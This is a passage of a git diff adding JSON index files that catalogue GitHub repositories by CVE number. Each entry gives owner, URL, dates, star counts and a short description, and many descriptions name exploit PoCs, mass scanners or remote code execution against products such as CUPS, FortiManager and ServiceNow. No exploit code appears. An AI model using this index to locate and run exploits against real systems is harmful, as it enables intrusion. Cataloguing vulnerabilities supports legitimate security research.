"has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 874384484, + "name": "CUPS-CVE-2024-47176", + "full_name": "gianlu111\/CUPS-CVE-2024-47176", + "owner": { + "login": "gianlu111", + "id": 43763664, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43763664?v=4", + "html_url": "https:\/\/github.com\/gianlu111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gianlu111\/CUPS-CVE-2024-47176", + "description": "A Mass Scanner designed to detect the CVE-2024-47176 vulnerability across systems running the Common Unix Printing System (CUPS). ", + "fork": false, + "created_at": "2024-10-17T18:21:10Z", + "updated_at": "2024-10-17T18:49:53Z", + "pushed_at": "2024-10-17T18:32:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 875147460, + "name": "CVE-2024-47176", + "full_name": "0x7556\/CVE-2024-47176", + "owner": { + "login": "0x7556", + "id": 50582207, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50582207?v=4", + "html_url": "https:\/\/github.com\/0x7556", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x7556\/CVE-2024-47176", + "description": "Unix CUPS打印系统 远程代码执行漏洞", + "fork": false, + "created_at": "2024-10-19T08:08:02Z", + "updated_at": "2024-10-19T08:20:57Z", + "pushed_at": "2024-10-19T08:23:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-47177.json b/2024/CVE-2024-47177.json new file mode 100644 index 0000000000..091e0b72c9 --- /dev/null +++ b/2024/CVE-2024-47177.json @@ -0,0 +1,33 @@ +[ + { + "id": 863885454, + "name": "cupspot-2024-47177", + "full_name": "referefref\/cupspot-2024-47177", + "owner": { + "login": "referefref", + "id": 56499429, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56499429?v=4", + "html_url": "https:\/\/github.com\/referefref", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/referefref\/cupspot-2024-47177", + "description": "PoC honeypot for detecting exploit attempts against CVE-2024-47177", + "fork": false, + "created_at": "2024-09-27T05:18:23Z", + "updated_at": "2024-11-03T07:09:28Z", + "pushed_at": "2024-09-30T04:36:30Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-47575.json b/2024/CVE-2024-47575.json new file mode 100644 index 0000000000..738232d93b --- /dev/null +++ b/2024/CVE-2024-47575.json @@ -0,0 +1,126 @@ +[ + { + "id": 885039863, + "name": "Fortijump-Exploit-CVE-2024-47575", + "full_name": "watchtowrlabs\/Fortijump-Exploit-CVE-2024-47575", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/Fortijump-Exploit-CVE-2024-47575", + "description": "Fortinet Fortimanager Unauthenticated Remote Code Execution AKA FortiJump CVE-2024-47575", + "fork": false, + "created_at": "2024-11-07T21:03:30Z", + "updated_at": "2024-11-27T19:14:30Z", + "pushed_at": "2024-11-14T16:25:52Z", + "stargazers_count": 69, + "watchers_count": 69, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 69, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 888812186, + "name": "exploit-cve-2024-47575", + "full_name": "skyalliance\/exploit-cve-2024-47575", + "owner": { + "login": "skyalliance", + "id": 127739423, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127739423?v=4", + "html_url": "https:\/\/github.com\/skyalliance", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skyalliance\/exploit-cve-2024-47575", + "description": "FortiManager Unauthenticated Remote Code Execution (CVE-2024-47575)", + "fork": false, + "created_at": "2024-11-15T03:43:51Z", + "updated_at": "2024-11-18T10:19:14Z", + "pushed_at": "2024-11-15T03:43:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889026655, + "name": "CVE-2024-47575", + "full_name": "expl0itsecurity\/CVE-2024-47575", + "owner": { + "login": "expl0itsecurity", + "id": 185355311, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/185355311?v=4", + "html_url": "https:\/\/github.com\/expl0itsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/expl0itsecurity\/CVE-2024-47575", + "description": null, + "fork": false, + "created_at": "2024-11-15T13:19:33Z", + "updated_at": "2024-11-19T19:03:13Z", + "pushed_at": "2024-11-15T18:56:01Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892397687, + "name": "cve-2024-47575-exp", + "full_name": "XiaomingX\/cve-2024-47575-exp", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-47575-exp", + "description": "CVE-2024-47575是Fortinet的FortiManager和FortiManager Cloud产品中的一个严重漏洞,源于fgfmsd守护进程缺乏对关键功能的身份验证。", + "fork": false, + "created_at": "2024-11-22T03:13:03Z", + "updated_at": "2024-11-22T13:43:07Z", + "pushed_at": "2024-11-22T03:17:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4761.json b/2024/CVE-2024-4761.json new file mode 100644 index 0000000000..c45ec8e52c --- /dev/null +++ b/2024/CVE-2024-4761.json @@ -0,0 +1,33 @@ +[ + { + "id": 800632738, + "name": "CVE-2024-4761", + "full_name": "michredteam\/CVE-2024-4761", + "owner": { + "login": "michredteam", + "id": 168865716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168865716?v=4", + "html_url": "https:\/\/github.com\/michredteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michredteam\/CVE-2024-4761", + "description": "High CVE-2024-4761 Exploit ", + "fork": false, + "created_at": "2024-05-14T17:45:22Z", + "updated_at": "2024-06-02T12:44:20Z", + "pushed_at": "2024-05-14T18:21:02Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-47854.json b/2024/CVE-2024-47854.json new file mode 100644 index 0000000000..94d34f9107 --- /dev/null +++ b/2024/CVE-2024-47854.json @@ -0,0 +1,33 @@ +[ + { + "id": 875249581, + "name": "CVE-2024-47854", + "full_name": "MarioTesoro\/CVE-2024-47854", + "owner": { + "login": "MarioTesoro", + "id": 62204045, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62204045?v=4", + "html_url": "https:\/\/github.com\/MarioTesoro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MarioTesoro\/CVE-2024-47854", + "description": "Proof of concept of multiple Reflected Cross-Site Scripting (XSS) vulnerabilities discovered in Veritas Data Insight before 7.1.", + "fork": false, + "created_at": "2024-10-19T13:38:23Z", + "updated_at": "2024-10-20T18:11:25Z", + "pushed_at": "2024-10-20T18:11:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48208.json b/2024/CVE-2024-48208.json new file mode 100644 index 0000000000..05e809225b --- /dev/null +++ b/2024/CVE-2024-48208.json @@ -0,0 +1,41 @@ +[ + { + "id": 880590271, + "name": "CVE-2024-48208", + "full_name": "rohilchaudhry\/CVE-2024-48208", + "owner": { + "login": "rohilchaudhry", + "id": 146772664, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146772664?v=4", + "html_url": "https:\/\/github.com\/rohilchaudhry", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rohilchaudhry\/CVE-2024-48208", + "description": "This repo contains all the work surrounding the development of the PoC for CVE-2024-48208, and how a simple OOB(Out-of-bound) read can result in jail escapes as well as broken access control.", + "fork": false, + "created_at": "2024-10-30T01:44:32Z", + "updated_at": "2024-11-11T17:49:43Z", + "pushed_at": "2024-11-05T15:09:29Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer-overflow", + "cve", + "cve-2024-48208", + "exploit", + "heap", + "overflow", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48217.json b/2024/CVE-2024-48217.json new file mode 100644 index 0000000000..64eba4bfbe --- /dev/null +++ b/2024/CVE-2024-48217.json @@ -0,0 +1,33 @@ +[ + { + "id": 881716535, + "name": "CVE-2024-48217", + "full_name": "ajrielrm\/CVE-2024-48217", + "owner": { + "login": "ajrielrm", + "id": 45825467, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45825467?v=4", + "html_url": "https:\/\/github.com\/ajrielrm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ajrielrm\/CVE-2024-48217", + "description": "CVE-2024-48217 Sismart Vulnerability", + "fork": false, + "created_at": "2024-11-01T04:44:17Z", + "updated_at": "2024-11-02T05:24:19Z", + "pushed_at": "2024-11-02T05:24:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48322.json b/2024/CVE-2024-48322.json new file mode 100644 index 0000000000..8af24ec0c0 --- /dev/null +++ b/2024/CVE-2024-48322.json @@ -0,0 +1,33 @@ +[ + { + "id": 885825604, + "name": "CVE-2024-48322", + "full_name": "trqt\/CVE-2024-48322", + "owner": { + "login": "trqt", + "id": 30443527, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30443527?v=4", + "html_url": "https:\/\/github.com\/trqt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trqt\/CVE-2024-48322", + "description": null, + "fork": false, + "created_at": "2024-11-09T13:52:50Z", + "updated_at": "2024-11-15T13:24:49Z", + "pushed_at": "2024-11-09T14:03:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48325.json b/2024/CVE-2024-48325.json new file mode 100644 index 0000000000..e7fbf93cf8 --- /dev/null +++ b/2024/CVE-2024-48325.json @@ -0,0 +1,33 @@ +[ + { + "id": 882387857, + "name": "cve-2024-48325", + "full_name": "osvaldotenorio\/cve-2024-48325", + "owner": { + "login": "osvaldotenorio", + "id": 45275816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45275816?v=4", + "html_url": "https:\/\/github.com\/osvaldotenorio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/osvaldotenorio\/cve-2024-48325", + "description": null, + "fork": false, + "created_at": "2024-11-02T17:43:12Z", + "updated_at": "2024-11-07T00:50:54Z", + "pushed_at": "2024-11-07T00:50:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48326.json b/2024/CVE-2024-48326.json new file mode 100644 index 0000000000..64d70fe830 --- /dev/null +++ b/2024/CVE-2024-48326.json @@ -0,0 +1,33 @@ +[ + { + "id": 882443639, + "name": "CVE-2024-48326", + "full_name": "fabiobsj\/CVE-2024-48326", + "owner": { + "login": "fabiobsj", + "id": 11925049, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11925049?v=4", + "html_url": "https:\/\/github.com\/fabiobsj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fabiobsj\/CVE-2024-48326", + "description": null, + "fork": false, + "created_at": "2024-11-02T19:41:19Z", + "updated_at": "2024-11-02T19:57:14Z", + "pushed_at": "2024-11-02T19:57:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48336.json b/2024/CVE-2024-48336.json new file mode 100644 index 0000000000..ad4ee30d7c --- /dev/null +++ b/2024/CVE-2024-48336.json @@ -0,0 +1,33 @@ +[ + { + "id": 846894468, + "name": "MagiskEoP", + "full_name": "canyie\/MagiskEoP", + "owner": { + "login": "canyie", + "id": 31466456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31466456?v=4", + "html_url": "https:\/\/github.com\/canyie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/canyie\/MagiskEoP", + "description": "Exploit and writeup for installed app to root privilege escalation through CVE-2024-48336 (Magisk Bug #8279), Privileges Escalation \/ Arbitrary Code Execution Vulnerability", + "fork": false, + "created_at": "2024-08-24T08:51:08Z", + "updated_at": "2024-11-23T13:00:49Z", + "pushed_at": "2024-11-05T02:57:25Z", + "stargazers_count": 174, + "watchers_count": 174, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 174, + "score": 0, + "subscribers_count": 8 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48359.json b/2024/CVE-2024-48359.json new file mode 100644 index 0000000000..24fcbebba3 --- /dev/null +++ b/2024/CVE-2024-48359.json @@ -0,0 +1,33 @@ +[ + { + "id": 880891866, + "name": "CVE-2024-48359", + "full_name": "OpenXP-Research\/CVE-2024-48359", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2024-48359", + "description": "CVE-2024-48359 PoC", + "fork": false, + "created_at": "2024-10-30T14:52:04Z", + "updated_at": "2024-11-12T08:54:14Z", + "pushed_at": "2024-10-30T15:02:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48360.json b/2024/CVE-2024-48360.json new file mode 100644 index 0000000000..7f9d89f5ee --- /dev/null +++ b/2024/CVE-2024-48360.json @@ -0,0 +1,33 @@ +[ + { + "id": 880893405, + "name": "CVE-2024-48360", + "full_name": "OpenXP-Research\/CVE-2024-48360", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2024-48360", + "description": "CVE-2024-48360 Poc", + "fork": false, + "created_at": "2024-10-30T14:55:07Z", + "updated_at": "2024-11-05T19:37:17Z", + "pushed_at": "2024-10-30T15:02:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48392.json b/2024/CVE-2024-48392.json new file mode 100644 index 0000000000..6d071124ca --- /dev/null +++ b/2024/CVE-2024-48392.json @@ -0,0 +1,33 @@ +[ + { + "id": 878366260, + "name": "CVE-2024-48392-PoC", + "full_name": "Renzusclarke\/CVE-2024-48392-PoC", + "owner": { + "login": "Renzusclarke", + "id": 77496879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77496879?v=4", + "html_url": "https:\/\/github.com\/Renzusclarke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Renzusclarke\/CVE-2024-48392-PoC", + "description": null, + "fork": false, + "created_at": "2024-10-25T09:00:11Z", + "updated_at": "2024-10-25T09:23:52Z", + "pushed_at": "2024-10-25T09:23:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48415.json b/2024/CVE-2024-48415.json new file mode 100644 index 0000000000..bac68c66c8 --- /dev/null +++ b/2024/CVE-2024-48415.json @@ -0,0 +1,33 @@ +[ + { + "id": 875127580, + "name": "CVE-2024-48415", + "full_name": "khaliquesX\/CVE-2024-48415", + "owner": { + "login": "khaliquesX", + "id": 185584210, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/185584210?v=4", + "html_url": "https:\/\/github.com\/khaliquesX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/khaliquesX\/CVE-2024-48415", + "description": null, + "fork": false, + "created_at": "2024-10-19T06:58:56Z", + "updated_at": "2024-10-19T07:08:10Z", + "pushed_at": "2024-10-19T07:08:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48427.json b/2024/CVE-2024-48427.json new file mode 100644 index 0000000000..5042924f39 --- /dev/null +++ b/2024/CVE-2024-48427.json @@ -0,0 +1,33 @@ +[ + { + "id": 877820324, + "name": "CVE-2024-48427", + "full_name": "vighneshnair7\/CVE-2024-48427", + "owner": { + "login": "vighneshnair7", + "id": 186159201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/186159201?v=4", + "html_url": "https:\/\/github.com\/vighneshnair7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vighneshnair7\/CVE-2024-48427", + "description": null, + "fork": false, + "created_at": "2024-10-24T09:50:31Z", + "updated_at": "2024-10-29T12:51:15Z", + "pushed_at": "2024-10-24T10:02:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48569.json b/2024/CVE-2024-48569.json new file mode 100644 index 0000000000..9b55676092 --- /dev/null +++ b/2024/CVE-2024-48569.json @@ -0,0 +1,33 @@ +[ + { + "id": 879186454, + "name": "CVE-2024-48569", + "full_name": "MarioTesoro\/CVE-2024-48569", + "owner": { + "login": "MarioTesoro", + "id": 62204045, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62204045?v=4", + "html_url": "https:\/\/github.com\/MarioTesoro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MarioTesoro\/CVE-2024-48569", + "description": "Proof of concept of multiple Stored Cross-Site Scripting (XSS) vulnerabilities discovered in ACI Worldwide Proactive Risk Manager v 9.1.1.0", + "fork": false, + "created_at": "2024-10-27T08:29:59Z", + "updated_at": "2024-11-03T09:33:37Z", + "pushed_at": "2024-11-03T09:33:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48605.json b/2024/CVE-2024-48605.json new file mode 100644 index 0000000000..c30949b65b --- /dev/null +++ b/2024/CVE-2024-48605.json @@ -0,0 +1,33 @@ +[ + { + "id": 863111238, + "name": "HelakuruV.1.1-DLLHijack", + "full_name": "surajhacx\/HelakuruV.1.1-DLLHijack", + "owner": { + "login": "surajhacx", + "id": 158517938, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158517938?v=4", + "html_url": "https:\/\/github.com\/surajhacx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/surajhacx\/HelakuruV.1.1-DLLHijack", + "description": "Helakuru Version 1.1 DLL Hijack - CVE-2024-48605", + "fork": false, + "created_at": "2024-09-25T18:23:06Z", + "updated_at": "2024-10-22T16:28:37Z", + "pushed_at": "2024-10-21T21:33:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48644.json b/2024/CVE-2024-48644.json new file mode 100644 index 0000000000..626bd16bdc --- /dev/null +++ b/2024/CVE-2024-48644.json @@ -0,0 +1,33 @@ +[ + { + "id": 874489228, + "name": "CVE-2024-48644", + "full_name": "rosembergpro\/CVE-2024-48644", + "owner": { + "login": "rosembergpro", + "id": 7573860, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7573860?v=4", + "html_url": "https:\/\/github.com\/rosembergpro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rosembergpro\/CVE-2024-48644", + "description": "Reolink Duo 2 WiFi v1.0.280 - Account Enumeration Vulnerability", + "fork": false, + "created_at": "2024-10-17T23:27:04Z", + "updated_at": "2024-10-18T02:21:47Z", + "pushed_at": "2024-10-18T02:21:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48652.json b/2024/CVE-2024-48652.json new file mode 100644 index 0000000000..d90aa6c327 --- /dev/null +++ b/2024/CVE-2024-48652.json @@ -0,0 +1,33 @@ +[ + { + "id": 875183000, + "name": "CVE-2024-48652", + "full_name": "paragbagul111\/CVE-2024-48652", + "owner": { + "login": "paragbagul111", + "id": 68190427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68190427?v=4", + "html_url": "https:\/\/github.com\/paragbagul111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paragbagul111\/CVE-2024-48652", + "description": "Cross Site Scripting vulnerability in camaleon-cms v.2.7.5 allows remote attacker to execute arbitrary code via the content group name field", + "fork": false, + "created_at": "2024-10-19T10:06:58Z", + "updated_at": "2024-10-19T10:21:13Z", + "pushed_at": "2024-10-19T10:21:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4875.json b/2024/CVE-2024-4875.json new file mode 100644 index 0000000000..80b1ecc911 --- /dev/null +++ b/2024/CVE-2024-4875.json @@ -0,0 +1,33 @@ +[ + { + "id": 803866868, + "name": "CVE-2024-4875", + "full_name": "RandomRobbieBF\/CVE-2024-4875", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-4875", + "description": "HT Mega – Absolute Addons For Elementor <= 2.5.2 - Missing Authorization to Options Update", + "fork": false, + "created_at": "2024-05-21T14:15:16Z", + "updated_at": "2024-07-11T16:38:38Z", + "pushed_at": "2024-05-21T14:17:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4879.json b/2024/CVE-2024-4879.json new file mode 100644 index 0000000000..f6cc1eb655 --- /dev/null +++ b/2024/CVE-2024-4879.json @@ -0,0 +1,281 @@ +[ + { + "id": 827768710, + "name": "CVE-2024-4879", + "full_name": "Brut-Security\/CVE-2024-4879", + "owner": { + "login": "Brut-Security", + "id": 172168319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168319?v=4", + "html_url": "https:\/\/github.com\/Brut-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Brut-Security\/CVE-2024-4879", + "description": "CVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow", + "fork": false, + "created_at": "2024-07-12T10:32:37Z", + "updated_at": "2024-10-28T17:52:37Z", + "pushed_at": "2024-07-13T10:46:32Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 22, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 827823810, + "name": "CVE-2024-4879", + "full_name": "bigb0x\/CVE-2024-4879", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-4879", + "description": "Bulk scanning tool for ServiceNow CVE-2024-4879 vulnerability", + "fork": false, + "created_at": "2024-07-12T13:02:47Z", + "updated_at": "2024-08-25T03:37:27Z", + "pushed_at": "2024-07-12T20:48:26Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828006472, + "name": "CVE-2024-4879", + "full_name": "Mr-r00t11\/CVE-2024-4879", + "owner": { + "login": "Mr-r00t11", + "id": 68824333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68824333?v=4", + "html_url": "https:\/\/github.com\/Mr-r00t11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-r00t11\/CVE-2024-4879", + "description": null, + "fork": false, + "created_at": "2024-07-12T21:43:48Z", + "updated_at": "2024-08-29T13:31:14Z", + "pushed_at": "2024-07-12T21:46:19Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828935876, + "name": "CVE-2024-4879", + "full_name": "ShadowByte1\/CVE-2024-4879", + "owner": { + "login": "ShadowByte1", + "id": 155693555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155693555?v=4", + "html_url": "https:\/\/github.com\/ShadowByte1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShadowByte1\/CVE-2024-4879", + 